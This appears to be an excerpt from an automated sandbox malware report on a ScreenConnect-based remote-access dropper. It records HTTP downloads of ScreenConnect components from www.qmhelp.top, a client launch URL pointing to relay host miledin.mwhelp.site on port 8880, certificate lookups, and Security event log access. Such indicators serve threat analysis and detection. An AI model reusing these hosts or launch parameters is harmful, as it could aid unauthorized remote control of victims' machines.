                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: www.qmhelp.top
                  Source: global trafficDNS traffic detected: DNS query: miledin.mwhelp.site
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B6A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/Dig
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: dfsvc.exe, 00000001.00000002.1782486332.000001BCC0B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cB
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD4.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1049047141.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1049047141.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTry
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.1782885176.000001BCC0BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.1782097139.000001BCC0AE0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1782885176.000001BCC0BB8000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1049047141.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.di
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.1779439053.000001BCBCCD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.1783154349.000001BCC0C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crld
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4551000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.000000000260A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.1782097139.000001BCC0AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wU3.org/2000/0Vldsig#sha1Z5D
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B1D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C07000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.qmhelp.top
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA494B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324595190.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B1D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4748000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.C
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324008267.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.1783154349.000001BCC0C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.:
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324008267.0000000000741000.00000004.00000020.00020000.00000000.sdmp, WY5C07FJ.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1782589812.000001BCC0B65000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1783996071.000001BCC0CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application%
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324008267.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application4db01
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application5db01rm)
                  Source: dfsvc.exe, 00000001.00000002.1782589812.000001BCC0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application=
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324939015.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=
                  Source: WY5C07FJ.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationE
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1324008267.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application_
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicatione12t
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicatione=msil
                  Source: dfsvc.exe, 00000001.00000002.1779439053.000001BCBCD03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationexe4e089
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1324008267.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationplication
                  Source: dfsvc.exe, 00000001.00000002.1779439053.000001BCBCD03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationplicatione089
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B1D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4748000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1783624779.000001BCC0CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA486A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA492B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1779439053.000001BCBCCD7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.000000000256A000.00000004.00000800.00020000.00000000.sdmp, WY5C07FJ.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.1779439053.000001BCBCCD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.manifestIM
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B1D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.1781534307.000001BCBEB13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.dllY
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.1782097139.000001BCC0B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.exee
                  Source: dfsvc.exe, 00000001.00000002.1783624779.000001BCC0CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageS
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.1782693476.000001BCC0B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeM
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeX
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D84000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.ex8
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.1781534307.000001BCBEB13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configV
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownHTTPS traffic detected: 104.21.72.99:443 -> 192.168.2.9:49684 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
